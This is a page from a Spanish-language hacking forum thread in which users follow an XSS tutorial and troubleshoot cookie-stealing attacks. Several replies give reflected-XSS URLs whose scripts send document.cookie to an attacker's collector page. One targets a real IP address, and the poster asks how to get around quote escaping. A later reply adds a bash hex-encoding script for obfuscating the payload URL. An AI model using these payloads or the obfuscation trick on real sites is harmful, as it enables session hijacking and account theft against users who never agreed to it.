elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 [6] Ir Abajo Respuesta Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 148,293 veces)
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #50 en: 18 Noviembre 2009, 15:24 pm »

Lo más recomendable es guardar en hosting a travez de php, aunque junto con guardarla podrías mandarla al mismo tiempo con php a tú correo :) siempre con php, no creo que javascript tenga funciones para enviar correos ya que se ejecuta de lado del cliente


En línea

FL4M4-D0R4D4

Desconectado Desconectado

Mensajes: 1


www.sereforma.edu.mx/admin


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #51 en: 11 Junio 2010, 01:03 am »

Hola amigo intente ponerlo el primero codigo (<script>alert()</script>) y al momento y me salio esto la pagina es www.z8games.com

no se si es algo malo o bueno ( Soy novato)


En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #52 en: 11 Junio 2010, 06:30 am »

Eso es porque el programador dejo mostrando los errores, no significa que sea vulnerable por si misma.
En línea

Danielyyo

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #53 en: 5 Septiembre 2010, 17:33 pm »

Hola a todos,

  El caso es que ando probando esta forma de ataque XSS con una aplicación vulnerable, y otra aplicación malintencionada, ambas creadas y alojadas por mi, y no consigo hacerlo funcionar. El codigo de la aplicacion malintencionada es exactamente el propuesto aqui para copiar la cookie a "archivo.txt" y la "url maligna" queda del siguiente modo:
Código:
http://80.34.108.239/hackw20/application/user_management/login.php?msg=<script>window.location='http://127.0.0.1/evil/application/cookie_steal.php?cookie='+document.cookie;</script>;
El caso es que al ver posteriormente el codigo fuente de la pagina, parece que en navegador (probado en opera y en chrome) inserta caracteres de escape para las comillas simples, es decir ' -> \' con lo que parece que los navegadores ya proporcionan proteccion contra este tipo de ataque. He probado a cambiar desde la ? a hexadecimal.., a cambiar las comillas simples por dobles, y nada. Unicamente al cambiar las simples por graves ' -> ` parece que el navegador no las toca, pero tampoco funciona. ¿Alguna idea de si este comportamiento es asi, o estoy haciendo algo mal? En caso de que sea asi ¿como lo engañamos? Gracias.

Saludos!
En línea

jilipum

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #54 en: 23 Octubre 2010, 01:22 am »

Eh hola a todos que hay de nuevo pipol , ultimamente pasaba bastante por aquí aparte de por otros  sitios similiares... y nada que com ultimamte estoy muy desocupado y motivado ,y aparte de esta pregunta, que ha quedao abierta al publico ....

pues haber si se pasa alguién de buen rollo y aclara el ultimo mensaje de danielyyo...
lo pido porfavor es que se me ace un poco duro estar leiendo tó el post y quedarme con dudas en el ultimo sms...   

no me quejo de nada esto se que es en todos los sitios lo que me pongo a buscar cosas del metasploit por ejemplo y acavo leiendo estas cosas que aunque se aprende mucho y puedan servir de gran utilidad, me desvian demasiado...

¿aún funciona con algo esta teknika o ya está parcheada ? y si ya esta parcheada, me pregunto también, ¿si no hay forma de dar permisos como a los firewalls o modificar antes algo en el host/ip victima por ejemplo mediante una shell u argo?


En línea

pelonms7

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #55 en: 9 Febrero 2011, 15:15 pm »

Saludos,

Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo

asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

como puedo hacer para que se ejecute? Saludos
En línea

Costa Rica WOW!!!!
ERA

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #56 en: 4 Diciembre 2018, 19:25 pm »

Muy bueno el esfuerzo para la explicación!  ;-)

Me dieron ganas de colaborar!

Para ofuscar la URL

Crean el archivo ./toHexUrl.sh o como les plasca el nombre y le ponen dentro:

#!/bin/bash
echo $1 | hexdump -ve '/1 " %02X"'|sed s/' '/%/g;

Lo usan así:

 ./toHexUrl.sh  "<script>alert('pepe');</script>"

Produce:

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%70%65%70%65%27%29%3B%3C%2F%73%63%72%69%70%74%3E%0A


Sino, pueden hacer así:

printf "<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>"|hexdump -ve '/1 " %02X"'|sed s/' '/%/g;

%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E


 :silbar: ::)
En línea

ERA

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #57 en: 4 Diciembre 2018, 19:27 pm »

ufff, lo siento si alguien dijo antes lo que yo, no vi que habia 6 hojas, mala mia!, me quede en la primera  :-[
En línea

Páginas: 1 2 3 4 5 [6] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
OceanLotus APT usa el RAT Ratsnif en sus ataques
Noticias
wolfbcn 0 1,169 Último mensaje 3 Julio 2019, 02:07 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines